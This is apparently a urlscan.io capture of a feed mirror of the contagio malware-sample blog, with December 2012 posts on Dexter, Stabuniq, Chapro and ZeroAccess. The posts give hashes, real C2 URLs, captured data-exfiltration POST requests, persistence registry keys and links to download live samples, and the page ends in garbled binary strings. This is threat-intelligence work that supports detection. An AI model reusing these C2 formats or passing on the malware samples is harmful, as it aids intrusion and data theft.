urlscan.io Public Scan: contagio13.rssing.com (185.150.190.192)
Submitted URL: http://contagio13.rssing.com/chan-24521930/all_p1.html
Effective URL: https://contagio13.rssing.com/chan-24521930/all_p1.html
Submission: On September 12 via manual from US — Scanned from DE
Channel: contagio

Channel Details:
* Title: contagio
* Channel Number: 24521930
* Language: eng
* Registered On: November 28, 2013, 12:57 pm
* Number of Articles: 71
* Latest Snapshot: July 9, 2022, 11:37 am
* RSS URL: http://contagiodump.blogspot.com/rss.xml
* Publisher: http://contagiodump.blogspot.com/
* Description: malware dump
* Catalog: //contagio13.rssing.com/catalog.php?indx=24521930

Showing article 1 to 20 of 71 in channel 24521930 (page 1).

DEC 2012 DEXTER - POS INFOSTEALER SAMPLES AND INFORMATION
December 22, 2012, 11:50 pm

End of the year presents. Point of Sale (POS) infostealer, aka Dexter. I got 3 more "tester-type" samples and added them below - in addition to the well known 4 samples mentioned by Seculert.

You can read more about it here:
* Seculert: Dexter - Draining blood out of Point of Sales
* TrendMicro: Infostealer Dexter Targets Checkout Systems
* Verizon: Dexter: More of the same, or hidden links?
* Volatility Labs: Unpacking Dexter POS "Memory Dump Parsing" Malware
* Trustwave Labs: The Dexter Malware: Getting Your Hands Dirty
* Symantec: Infostealer.Dexter

Files

The following are MD5s (with SHA256s) of Dexter related malware samples.

Samples mentioned by Seculert (Dexter - Draining blood out of Point of Sales):
* MD5 2d48e927cdf97413523e315ed00c90ab / SHA256 94c604e5cff7650f60049993405858dfc96f8ac5b77587523d37a8f8f3d9c1bc
* MD5 70feec581cd97454a74a0d7c1d3183d1 / SHA256 cae3cdaaa1ec224843e1c3efb78505b2e0781d70502bedff5715dc0e9b561785
* MD5 f84599376e35dbe1b33945b64e1ec6ab / SHA256 b27aadd3ddca1af7db6f441c6401cf74b1561bc828e19f9104769ef2d158778e
* MD5 ed783ccea631bde958ac64185ca6e6b6 / SHA256 fb46ea9617e0c8ead0e4358da6233f3706cfc6bbbeba86a87aaab28bb0b21241

Additional Files:
* MD5 65f5b1d0fcdaff431eec304a18fb1bd6 / SHA256 7e327be39260fe4bb8923af25a076cd3569df54e0328c7fe5cd7c6a2d3312674
* MD5 560566573de9df114677881cf4090e79 / SHA256 28a26fe50e2d4e2b541ae083aa0236bd484c7eb3b30cf9b5a7f4d579e77bf438
* MD5 1f03568616524188425f92afbea3c242 / SHA256 bdbe024a08c9a4e62c5692762aa03b4c1e564b38510cb4b4b1758e371637edb4

Download
Download 7 samples listed above (email me if you need the password)

General information

> Samples
> 2d48e927cdf97413523e315ed00c90ab (Seculert MD5)
> f84599376e35dbe1b33945b64e1ec6ab (Seculert MD5)
> ed783ccea631bde958ac64185ca6e6b6 (Seculert MD5)
> all contain http://193.107.17.126/test/gateway.php for C2 communications
> (Verizon: Dexter: More of the same, or hidden links?)

U:\FirmWork\Studio\Common\Bin.exe in strings is found in:
* ed783ccea631bde958ac64185ca6e6b6 (Seculert MD5)
* 2d48e927cdf97413523e315ed00c90ab (Seculert MD5)
* f84599376e35dbe1b33945b64e1ec6ab (Seculert MD5)
* 560566573de9df114677881cf4090e79
* 1f03568616524188425f92afbea3c242
* 65f5b1d0fcdaff431eec304a18fb1bd6

@@PAUH in strings found in all 9 files

Individual file information

1. 70feec581cd97454a74a0d7c1d3183d1 (Seculert MD5)
=====================================================================
SHA256: cae3cdaaa1ec224843e1c3efb78505b2e0781d70502bedff5715dc0e9b561785
MD5: 70feec581cd97454a74a0d7c1d3183d1 (Seculert MD5)
%userprofile%\Application Data\fubqq\fubqq.exe
Injected in iexplore.exe

C2: e.g. POST http://fabcaa97871555b68aa095335975e613.com:80/portal1/gateway.php or any of the domains below (Verizon: Dexter: More of the same, or hidden links?):
* 11e2540739d7fbea1ab8f9aa7a107648.com
* 7186343a80c6fa32811804d23765cda4.com
* e7dce8e4671f8f03a040d08bb08ec07a.com
* e7bc2d0fceee1bdfd691a80c783173b4.com
* 815ad1c058df1b7ba9c0998e2aa8a7b4.com
* 67b3dba8bc6778101892eb77249db32e.com
* fabcaa97871555b68aa095335975e613.com

Traffic:
Address A <-> Address B            | <- Frames  Bytes | -> Frames  Bytes | Total Frames  Bytes |
173.255.196.136 <-> 172.16.253.130 |   150     37230  |   120     7200   |   270        44430  |
172.16.253.255 <-> 172.16.253.1    |   107     35324  |     0        0   |   107        35324  |

> ASCII strings
> GetSystemWindowsDirectoryW
> KERNEL32.dll
> C:\Debugger.fgh
> ,vr1
> ---snip----
> ModuleReplace.exe
> LoadMemberData
> ?RenameCommand@@YG_JPAUIRootStorage@@PAUHUMPD__@@@Z
> ?RenameFortation@@YG_JPAUIRootStorage@@PAUHUMPD__@@@Z
> ?RenameHerbal@@YG_JPAUIRootStorage@@PAUHUMPD__@@@Z
> ?RenameLoadMac@@YG_JPAUIRootStorage@@PAUHUMPD__@@@Z
> ?RenameOptimize@@YG_JPAUIRootStorage@@PAUHUMPD__@@@Z
> ?RenameTest@@YG_JPAUIRootStorage@@PAUHUMPD__@@@Z
> VS_VERSION_INFO
> StringFileInfo
> 040904B0
> CompanyName
> Microsoft Corporation
> FileDescription
> Microsoft Help and Support
> FileVersion
> 6.1.7600.16385 (win7_rtm.090713-1255)
> InternalName
> HelpPane.exe
> LegalCopyright
> Microsoft Corporation. All rights reserved.
> OriginalFilename
> HelpPane.exe
> ProductName
> Microsoft
> Windows
> Operating System
> ProductVersion
> 6.1.7600.16385

2. 2D48E927CDF97413523E315ED00C90AB (Seculert MD5)
=====================================================================
SHA256: 94c604e5cff7650f60049993405858dfc96f8ac5b77587523d37a8f8f3d9c1bc
%userprofile%\Application Data\pmnnw\pmnnw.exe
http://193.107.17.126:80/test/gateway.php

Traffic:
Address A <-> Address B            | <- Frames  Bytes  | -> Frames  Bytes | Total Frames  Bytes  |
172.16.253.255 <-> 172.16.253.1    |  1003    335116   |     0        0   |  1003       335116   |
193.107.17.126 <-> 172.16.253.130  |   264     16368   |    88     5280   |   352        21648   |

> ASCII Strings
> T7M
> #nR
> U:\FirmWork\Studio\Common\Bin.exe
> AssistCoop.exe
> ?FancyBack@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z
> ?OptimusIO@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z
> ?OptionWindowGear@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z

pcap and traffic same as above.

3. ED783CCEA631BDE958AC64185CA6E6B6 (Seculert MD5)
========================================================================
SHA256: fb46ea9617e0c8ead0e4358da6233f3706cfc6bbbeba86a87aaab28bb0b21241
%userprofile%\Application Data\jikmr\jikmr.exe
http://193.107.17.126:80/test/gateway.php

Traffic:
Address A <-> Address B            | <- Frames  Bytes | -> Frames  Bytes | Total Frames  Bytes |
172.16.253.255 <-> 172.16.253.1    |   108     35676  |     0        0   |   108        35676  |
193.107.17.126 <-> 172.16.253.129  |    30      1860  |     9      540   |    39         2400  |

> ASCII Strings
> pbk
> }64
> U:\FirmWork\Studio\Common\Bin.exe
> Vljdsevr
> ----snip-----
> SHLWAPI.dll
> TeamReg.exe
> ?FancyBack@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z
> ?ForsakenQuantum@@YGKPAUHKEY__@@PAUHPALETTE__@@@Z
> ?OptimusIO@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z
> ?OptionWindowGear@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z

4. F84599376E35DBE1B33945B64E1EC6AB (Seculert MD5)
========================================================================
SHA256: b27aadd3ddca1af7db6f441c6401cf74b1561bc828e19f9104769ef2d158778e
%userprofile%\Application Data\yebcs\yebcs.exe
http://193.107.17.126:80/test/gateway.php

> ASCII strings
> TkJ
> U:\FirmWork\Studio\Common\Bin.exe
> Kagtklnuhjchep
> Trebuchet MS
> ------snip------------
> GetQueueStatus
> USER32.dll
> TeamReg.exe
> ?FancyBack@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z
> ?ForsakenQuantum@@YGKPAUHKEY__@@PAUHPALETTE__@@@Z
> ?OptimusIO@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z

Additional samples

5. 1F03568616524188425F92AFBEA3C242
========================================================================
SHA256: bdbe024a08c9a4e62c5692762aa03b4c1e564b38510cb4b4b1758e371637edb4
MD5: 1F03568616524188425F92AFBEA3C242
%userprofile%\Application Data\pstwx\pstwx.exe
\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN -> %userprofile%\Application Data\pstwx\pstwx.exe
Injected in iexplore.exe
Process ID: 2756 (iexplore.exe)
Process doesn't appear to be a service

PID   Proto  Port  Local IP         State     Remote IP:Port
2756  TCP    1130  172.16.253.129   SYN SENT  193.107.17.126:80

http://193.107.17.126:80/test/gateway.php

Conversations:
Address A <-> Address B            | <- Frames  Bytes | -> Frames  Bytes | Total Frames  Bytes |
172.16.253.255 <-> 172.16.253.1    |    13      3016  |     0        0   |    13         3016  |
193.107.17.126 <-> 172.16.253.129  |     3       186  |     1       60   |     4          246  |

WHOIS
Source: RIPE NCC
IP Address: 193.107.17.126
Country: Seychelles
Network Name: IDEALSOLUTION
Owner Name: Ideal Solution Ltd
From IP: 193.107.16.0
To IP: 193.107.19.255
Allocated: Yes
Contact Name: Ideal Solution NOC
Address: Sound & Vision House, Francis Rachel Str., Victoria, Mahe, Seychelles
Email: ideal.solutions.org@gmail.com

However, real location is in Russia:
http://bgp.he.net/AS58001#_whois
http://bgp.he.net/AS58001#_peers

role:     Ideal Solution NOC
address:  Sound & Vision House, Francis Rachel Str.
address:  Victoria, Mahe, Seychelles
remarks:  ***************************************
remarks:  This is Ideal-Solution and 2x4.ru IP network
remarks:
6. 65F5B1D0FCDAFF431EEC304A18FB1BD6
======================================================================
SHA256: 7e327be39260fe4bb8923af25a076cd3569df54e0328c7fe5cd7c6a2d3312674
MD5: 65F5B1D0FCDAFF431EEC304A18FB1BD6
%userprofile%\Application Data\kwqpn\kwqpn.exe
http://193.107.17.126:80/test/gateway.php

Traffic:
Address A <-> Address B            | <- Frames  Bytes | -> Frames  Bytes | Total Frames  Bytes |
172.16.253.255 <-> 172.16.253.1    |    30      9000  |     0        0   |    30         9000  |
193.107.17.126 <-> 172.16.253.131  |     9       558  |     2      120   |    11          678  |

pcap and traffic same as above.

> ASCII Strings
> RSDSB
> U:\FirmWork\Studio\Common\Bin.exe
> AssistCoop.exe
> ?FancyBack@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z
> ?OptimusIO@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z
> ?OptionWindowGear@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z
> ?RegardSeven@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z
> ?RightApocoloptus@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z

7. 560566573de9df114677881cf4090e79
======================================================================
SHA256: 28a26fe50e2d4e2b541ae083aa0236bd484c7eb3b30cf9b5a7f4d579e77bf438
Application Data\aewtm\aewtm.exe
URL: http://193.107.17.126:80/test/gateway.php

> ASCII Strings
> RSDS
> U:\FirmWork\Studio\Common\Bin.exe
> AssistCoop.exe
> ?FancyBack@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z
> ?OptimusIO@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z
> ?OptionWindowGear@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z
> ?RegardSeven@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z

--------------------------------------------------------------------------------

DEC. 2012 TROJAN.STABUNIQ SAMPLES - FINANCIAL INFOSTEALER TROJAN
December 23, 2012, 10:17 pm

Holiday presents.

Research: Symantec. Trojan.Stabuniq Found on Financial Institution Servers
More research: Stabuniq in-Depth by Emanuele De Lucia

Here is another minor news maker of 2012. It is very well detected by most AV but if you want to play or make IDS or yara signatures, the pcap and the sample are below.

File
File: stabuniq_F31B797831B36A4877AA0FD173A7A4A2
Size: 79360
MD5: F31B797831B36A4877AA0FD173A7A4A2

Download
Download (Email me if you need the password)
Download pcap for F31B797831B36A4877AA0FD173A7A4A2

File information

F31B797831B36A4877AA0FD173A7A4A2
========================================================================
SHA256: 5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb

Created files:
C:\Program Files\7-Zip\Uninstall\smagent.exe << copy of itself F31B797831B36A4877AA0FD173A7A4A2

Injected in iexplore.exe
Process ID: 1536 (iexplore.exe)

PID   Proto  Port  Local IP         State     Remote IP:Port
1536  TCP    1130  172.16.253.129   SYN SENT  205.234.252.212:80

At this point domains maybe sinkholed.

Download pcap for F31B797831B36A4877AA0FD173A7A4A2

POST /rssnews.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: benhomelandefit.com
Content-Length: 1093
Cache-Control: no-cache

id=NzQxKDYoNig3&varname=SmdzdGc=&comp=QkNKSl5S&ver=UW9oYmlxdSZeVg==&src=NTREb3I=&sec=0&view=[...]&dat=&page=RTxaVnRpYXRnayZAb2pjdVoxK1xvdlpTaG9odXJnampadWtnYWNocihjfmM=&val=cnB5b3dub3BjZnRyZ2ZweWlyaXllYmdmZnhibHh4YWp5anN5b2x3YmxkeGRpcG9k&up=rpyownopcftrgfpy&xid=ZTU0N2BlPzMrZzc+NisyNWRiK2cyMzUrMDI1ZzNkNDBnNmA1

POST /rssnews.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: sovereutilizeignty.com
Content-Length: 1093
Cache-Control: no-cache

id=NzQxKDYoNig3&varname=SmdzdGc=&comp=QkNKSl5S&ver=UW9oYmlxdSZeVg==&src=NTREb3I=&sec=0&view=[...]&dat=&page=RTxaVnRpYXRnayZAb2pjdVoxK1xvdlpTaG9odXJnampadWtnYWNocihjfmM=&val=cnB5b3dub3BjZnRyZ2ZweWlyaXllYmdmZnhibHh4YWp5anN5b2x3YmxkeGRpcG9k&up=rpyownopcftrgfpy&xid=ZTU0N2BlPzMrZzc+NisyNWRiK2cyMzUrMDI1ZzNkNDBnNmA1

The following information is from Symantec:
http://www.symantec.com/security_response/writeup.jsp?docid=2012-121809-2437-99&tabid=2

> When the Trojan is executed, it may create the following files:
> %ProgramFiles%\[FOLDER NAME ONE]\[FOLDER NAME TWO]\acroiehelper.exe
> %ProgramFiles%\[FOLDER NAME ONE]\[FOLDER NAME TWO]\groovemonitor.exe
> %ProgramFiles%\[FOLDER NAME ONE]\[FOLDER NAME TWO]\issch.exe
> %ProgramFiles%\[FOLDER NAME ONE]\[FOLDER NAME TWO]\jqs.exe
> %ProgramFiles%\[FOLDER NAME ONE]\[FOLDER NAME TWO]\smagent.exe
>
> The variable [FOLDER NAME ONE] may be one of the following:
> AcroIEHelper Module
> GrooveMonitor Utility
> InstallShield Update Service Scheduler
> Java Quick Starter
> SoundMAX service agent
>
> The variable [FOLDER NAME TWO] may be one of the following:
> Bin
> Helper
> Installer
> Uninstall
> Update
>
> Next, the Trojan creates the following registry entries so that it runs every time Windows starts:
> HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"[RANDOM GUID]" = "[FILE NAME]"
> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"[RANDOM GUID]" = "[FILE NAME]"
> HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\"[RANDOM GUID]" = "[FILE NAME]"
>
> The Trojan then creates the following registry entry:
> HKEY_CURRENT_USER\Software\Stability Software\"Uniq" = "[RANDOM GUID]"
>
> Next, the Trojan may collect the following information from the compromised computer:
> Architecture type
> Computer name
> File name of the threat
> IP address
> Operating system version
> Operating system service pack version, if installed
> Running processes
>
> The Trojan may then send the stolen information to the following remote locations:
> anatwriteromist.com
> bbcnews192.com
> belsaw920.com
> benhomelandefit.com
> midfielderguin.com
> prominentpirsa.com
> sovereutilizeignty.com
> yolanda911.com

Automatic scans

https://www.virustotal.com/file/5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb/analysis/
SHA256: 5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb
SHA1: 17db1bbaa1bf1b920e47b28c3050cbff83ab16de
MD5: f31b797831b36a4877aa0fd173a7a4a2
File size: 77.5 KB ( 79360 bytes )
File name: vti-rescan
File type: Win32 EXE
Tags: peexe armadillo
Detection ratio: 28 / 45
Analysis date: 2012-12-21 13:48:23 UTC ( 2 days, 16 hours ago )

Engine                Detection                           Date
AhnLab-V3             Backdoor/Win32.Ruskill              20121221
AntiVir               TR/Graftor.27095.3                  20121221
Avast                 Win32:Ruskill-FQ [Trj]              20121221
AVG                   Dropper.Generic6.CAIC               20121221
BitDefender           Gen:Variant.Graftor.27095           20121221
DrWeb                 Trojan.Packed.22607                 20121221
Emsisoft              Gen:Variant.Graftor.27095 (B)       20121221
ESET-NOD32            a variant of Win32/Injector.RVT     20121221
F-Secure              Gen:Variant.Graftor.27095           20121221
Fortinet              W32/Injector.RVT!tr                 20121221
GData                 Gen:Variant.Graftor.27095           20121221
Ikarus                Worm.Win32.Dorkbot                  20121221
Kaspersky             HEUR:Trojan.Win32.Generic           20121221
Malwarebytes          Backdoor.Bot.wpm                    20121221
McAfee                Generic.dx!bg3a                     20121221
Microsoft             Trojan:Win32/Buniq.A                20121221
MicroWorld-eScan      Gen:Variant.Graftor.27095           20121221
NANO-Antivirus        Trojan.Win32.Graftor.ymdbi          20121221
Norman                W32/Suspicious_Gen4.BCNST           20121221
Panda                 Generic Malware                     20121221
PCTools               Trojan.Stabuniq                     20121221
Sophos                Mal/FakeAV-QN                       20121221
SUPERAntiSpyware      -                                   20121220
Symantec              Trojan.Stabuniq                     20121221
TheHacker             Trojan/Injector.rvt                 20121220
TrendMicro            TROJ_STABUNIQ.A                     20121221
TrendMicro-HouseCall  TROJ_STABUNIQ.A                     20121221
VIPRE                 Trojan.Win32.Generic!BT             20121221

--------------------------------------------------------------------------------

DEC 2012 LINUX.CHAPRO - TROJAN APACHE IFRAMER
December 23, 2012, 10:56 pm

Here is another notable development of 2012 - Linux malware (see Wirenet trojan posted earlier too).

Research: ESET Malicious Apache module used for content injection: Linux/Chapro.A

All the samples are below. I did not test it thus no pcaps this time.

------Linux/Chapro.A e022de72cce8129bd5ac8a0675996318
------Injected iframe 111e3e0bf96b6ebda0aeffdb444bcf8d
------Java exploit 2bd88b0f267e5aa5ec00d1452a63d9dc
------Zeus binary 3840a6506d9d5c2443687d1cf07e25d0

Download
Download.
(Email me if you need the password scheme - see profile for email)

------Linux/Chapro.A e022de72cce8129bd5ac8a0675996318
------Java exploit 2bd88b0f267e5aa5ec00d1452a63d9dc
------Zeus binary 3840a6506d9d5c2443687d1cf07e25d0

Automatic scans

Analysis: ESET Malicious Apache module used for content injection

https://www.virustotal.com/file/345a86f839372db0ee7367be0b9df2d2d844cef406407695a2f869d6b3380ece/analysis/
SHA256: 345a86f839372db0ee7367be0b9df2d2d844cef406407695a2f869d6b3380ece
SHA1: 2ccb789d57d3ce3dd929307eb78878e6e5c61ccf
MD5: e022de72cce8129bd5ac8a0675996318
File size: 38.3 KB ( 39176 bytes )
File name: e022de72cce8129bd5ac8a0675996318
File type: ELF
Tags: elf
Detection ratio: 19 / 46
Analysis date: 2012-12-21 19:12:13 UTC ( 2 days, 11 hours ago )

Engine                Detection                           Date
AVG                   Generic6_c.CLGW                     20121221
BitDefender           Backdoor.Linux.Agent.E              20121221
CAT-QuickHeal         -                                   20121220
Commtouch             -                                   20121221
Comodo                UnclassifiedMalware                 20121221
DrWeb                 Linux.Iframe.1                      20121221
ESET-NOD32            Linux/Chapro.A                      20121221
F-Secure              Backdoor.Linux.Agent.E              20121221
GData                 Backdoor.Linux.Agent.E              20121221
Ikarus                Backdoor.Linux.Apmod                20121221
Jiangmin              Backdoor/Linux.fs                   20121221
K7AntiVirus           Trojan                              20121221
Kaspersky             HEUR:Backdoor.Linux.Apmod.gen       20121221
MicroWorld-eScan      Backdoor.Linux.Agent.E              20121221
nProtect              Backdoor.Linux.Agent.E              20121221
PCTools               Malware.Linux-Chapro                20121221
Sophos                Troj/Apmod-D                        20121221
SUPERAntiSpyware      -                                   20121221
Symantec              Linux.Chapro                        20121221
TrendMicro            ELF_CHAPRO.A                        20121221
TrendMicro-HouseCall  ELF_CHAPRO.A                        20121221
ViRobot               Linux.A.Apmod.39176                 20121221

Exploit:Java/CVE-2012-1723

https://www.virustotal.com/file/a70a8891829344ad3db818b3c4ad76e38a78b0ce3c43d7aaf65752fe56d10e09/analysis/
SHA256: a70a8891829344ad3db818b3c4ad76e38a78b0ce3c43d7aaf65752fe56d10e09
SHA1: d01f76f5467c86bfa266c429e1315e7aad821f93
MD5: 2bd88b0f267e5aa5ec00d1452a63d9dc
File size: 30.2 KB ( 30957 bytes )
File name: nYCND
File type: ZIP
Tags: exploit zip cve-2012-1723
Detection ratio: 2 / 43
Analysis date: 2012-11-23 09:54:46 UTC ( 1 month ago )

Engine                Detection                               Date
Kaspersky             UDS:DangerousObject.Multi.Generic       20121123
Microsoft             Exploit:Java/CVE-2012-1723!generic      20121123

Zeus binary

https://www.virustotal.com/file/12f38f9be4df1909a1370d77588b74c60b25f65a098a08cf81389c97d3352f82/analysis/
SHA256: 12f38f9be4df1909a1370d77588b74c60b25f65a098a08cf81389c97d3352f82
SHA1: 5050b57e01bb2aa9730f826f36ad4d41477d8bd9
MD5: 3840a6506d9d5c2443687d1cf07e25d0
File size: 222.0 KB ( 227328 bytes )
File name: 3840a6506d9d5c2443687d1cf07e25d0
File type: Win32 EXE
Tags: peexe
Detection ratio: 32 / 44
Analysis date: 2012-12-22 20:02:23 UTC ( 1 day, 10 hours ago )

Engine                Detection                               Date
Agnitum               Trojan.Injector!5xrrtg7IXGQ             20121222
AntiVir               TR/PSW.Zbot.2884                        20121222
Avast                 Win32:Crypt-OMW [Trj]                   20121222
AVG                   PSW.Generic10.AOEA                      20121222
BitDefender           Trojan.Generic.8218925                  20121222
Comodo                TrojWare.Win32.Trojan.Agent.Gen         20121222
DrWeb                 Trojan.PWS.Panda.368                    20121222
ESET-NOD32            a variant of Win32/Injector.ZRA         20121222
F-Secure              Trojan.Generic.8218925                  20121222
Fortinet              W32/Zbot.ARO!tr                         20121222
GData                 Trojan.Generic.8218925                  20121222
Ikarus                Trojan.Win32.Yakes                      20121222
Jiangmin              TrojanSpy.Zbot.csit                     20121221
K7AntiVirus           Spyware                                 20121221
Kaspersky             Trojan-Spy.Win32.Zbot.gmeq              20121222
Kingsoft              Win32.Troj.Zbot.gm.(kcloud)             20121217
Malwarebytes          Trojan.Agent                            20121222
McAfee                PWS-Zbot.gen.aro                        20121222
McAfee-GW-Edition     PWS-Zbot.gen.aro                        20121222
Microsoft             PWS:Win32/Zbot                          20121222
Norman                W32/ZBot.DIJG                           20121222
nProtect              Trojan.Generic.8218925                  20121222
Panda                 Trj/Genetic.gen                         20121222
PCTools               Trojan-PSW.Generic!rem                  20121222
Sophos                Mal/Zbot-JM                             20121222
SUPERAntiSpyware      Trojan.Agent/Gen-Zbot                   20121222
Symantec              Infostealer                             20121222
TheHacker             Trojan/Injector.zra                     20121222
TrendMicro            TROJ_GEN.R21CDLF                        20121222
TrendMicro-HouseCall  TROJ_GEN.R21CDLF                        20121222
VBA32                 TrojanSpy.Zbot.gmeq                     20121221
VIPRE                 Trojan.Win32.Generic!BT                 20121222

--------------------------------------------------------------------------------

* * * MERRY CHRISTMAS AND HAPPY NEW YEAR! * * *
December 24, 2012, 10:07 pm
More presents to come, pa rum pum pum pum rum pum pum pum, rum pum pum pum ZEROACCESS / SIREFEF ROOTKIT - 5 FRESH SAMPLES December 25, 2012, 11:02 pm Next Dec. 2012 Skynet Tor botnet / Trojan.Tbot samples Previous * * * Merry Christmas and Happy New Year! * * * 0 0 Image may be NSFW. Clik here to view.Stocking stuffers. ZeroAccess rootkit is far from new and exciting but but this is a fresh lot with still active C2 servers. Although the dropper is detected by at least half of AV engines, post infection detection is another story. I tried Kaspersky TDSS Killer, Avast Rootkit utility and RootRepeal without any success. I used Gmer and LordPE to carve out the hidden file from the memory. You can use Redline or Volatility too. You can download 5 files below together with pcaps from one of the files and the file dumped from memory. It appears that free videos and apps names are used as the lure in this case. Download Image may be NSFW. Clik here to view.Download the 5 files below plus the file dumped from memory Download 2 pcap files from 2 runs of A2611095F689FADFFD3068E0D4E3E7ED File information * 251a2c7eff890c58a9d9eda5b1391082160 KB622.exe_ * 1a12137bd701bd9ed607671ce1b7806a160 KBanimal-sex-free.avi.exe_ * 59b247f0266b107451104243261a7ecf159 KBFlashPlayer_11_4_update_for_Win.exe_ * 98a993d62d367682048ec70df109e7d8161 KBreadme.exe_ * a2611095f689fadffd3068e0d4e3e7ed160 KBZeroAccess_xxx-porn-movie.avi.exe_ A2611095F689FADFFD3068E0D4E3E7ED Screenshots from A2611095F689FADFFD3068E0D4E3E7ED Download 2 pcap files from 2 runs of A2611095F689FADFFD3068E0D4E3E7ED hidden library - injected in Explorer.exe Image may be NSFW. Clik here to view. Image may be NSFW. Clik here to view. Strings from the dumped z binary File: dumped.dll MD5: fe756584b159fd24dc4b6a572917354c Size: 73728 Ascii Strings: --------------------------------------------------------------------------- !This program cannot be run in DOS mode. 
RichK6 t#cP[LordPE] SPC3 .text `.rdata @.data RtlImageNtHeader RtlImageDirectoryEntryToData LdrProcessRelocationBlock ----------------------------------------------------snip------------------------------------------------------ RtlExitUserThread wcslen swprintf LdrGetProcedureAddress wcsrchr wcscpy wcscat ZwOpenFile RtlInitUnicodeString ZwReadFile ZwClose ZwWriteFile ZwOpenEvent ZwQueryVolumeInformationFile memcpy RtlAppendUnicodeToString RtlConvertSidToUnicodeString ZwOpenProcessToken ZwQueryInformationToken ZwCreateEvent LdrFindEntryForAddress ZwCreateEventPair ZwSetHighWaitLowEventPair ZwWaitHighEventPair ZwSetLowEventPair memset RtlInterlockedPushEntrySList RtlInterlockedPopEntrySList RtlNtStatusToDosError ZwCreateSection ZwMapViewOfSection ZwUnmapViewOfSection RtlTimeToSecondsSince1980 qsort ZwQueryEaFile ZwQueryDirectoryFile wcstoul ZwDeleteFile ZwCreateFile ZwSetEaFile ZwSetInformationFile RtlAddressInSectionTable RtlComputeCrc32 ntdll.dll VirtualAlloc LoadLibraryA EnterCriticalSection LeaveCriticalSection VirtualFree LoadLibraryW FreeLibrary Sleep SleepEx InitializeCriticalSection DeleteCriticalSection GetProcAddress DisableThreadLibraryCalls CreateThread CreateTimerQueueTimer DeleteTimerQueueTimer LocalAlloc LocalFree BindIoCompletionCallback GetLastError GetSystemTimeAsFileTime KERNEL32.dll MD5Init MD5Update MD5Final CryptAcquireContextW CryptImportKey CryptGenRandom CryptDestroyKey CryptReleaseContext CryptCreateHash CryptSetHashParam CryptVerifySignatureW CryptDestroyHash ADVAPI32.dll AcceptEx MSWSOCK.dll WSASocketW WSAIoctl WSARecv WSASend WSASendTo WSARecvFrom WS2_32.dll RtlUnwind NtQueryVirtualMemory t#cP p2p.32.dll DllGetClassObject @S0j @p0j @p0j T0j@ U0j@ 0*0k0 1&101B1J1[1b1p1v1 2#2(2?2H2g2y2 2H3Q3m3s3 41484`4r4x4 546;6B6]6b6n6 7&757;7U7h7q7 8+888=8H8M8X8]8j8p8 9#90969@9J9P9W9^9e9j9o9 9F:M:T:Z:b: ;%;2; =$=2=<=s= >q?{? 
3*3s3~3R4m4z4 545Y5z5 6E6J6 6O7t7 9,9C9i9 9$:/:G:i: ;%;,;M;]; ;3<: data-blogger-escaped-i="i" data-blogger-escaped-j="j" data-blogger-escaped-z="z">q> ?.?>?P?^?p? 0(0:0F0W0h0 1#121R1 313R3Y3_3q3v3 4!4t4z4 5?5|5 9+9A9K9 ;,;R;[;t; <$<*<0 data-blogger-escaped-00080="00080" data-blogger-escaped-1.141="1.141" data-blogger-escaped-6="6" data-blogger-escaped-al="al" data-blogger-escaped-b="b" data-blogger-escaped-d0t0="d0t0" data-blogger-escaped-ddev="ddev" data-blogger-escaped-h="h" data-blogger-escaped-iy="iy" data-blogger-escaped-m="m" data-blogger-escaped-ur="ur">2i1FQ q'.C )5Rb !Q[#\ 5L@0 5e{u -~G5 iV:RE Scwn= /dq_ m|XK vT{! g]a%Ph Z,Jn gf[G:C0! >Ze\# b'fg (m9/ "0Gk_ @Vc}X J+[YR~m Ol"`o L*s~t6L (-w^ RdHQ is*X Lclu) [TRg" k#lhK& 2)\a N3?2t-% }vX} =0^FBO Jfjo hNHWF Eub! %h:A Zn=p #`N$ %JQ3 CVy\ n_"/? AYQD _pB0 @-S WQ<6 data-blogger-escaped-3cbi="3cbi" data-blogger-escaped-fdrtg="fdrtg" data-blogger-escaped-gj="gj" data-blogger-escaped-vb="e" data-blogger-escaped-y="y"> Kz!81 )v L X-vy YgB\ \Y82aM" ==.yf 2z"-{ ^guA ,~qw) 7z2F -IR4j;z1| >!Nh OZWG s&h!\ rKhi/ iVrOhi 7']lM K64} ivYi |fpK Jd$< 9CX? 
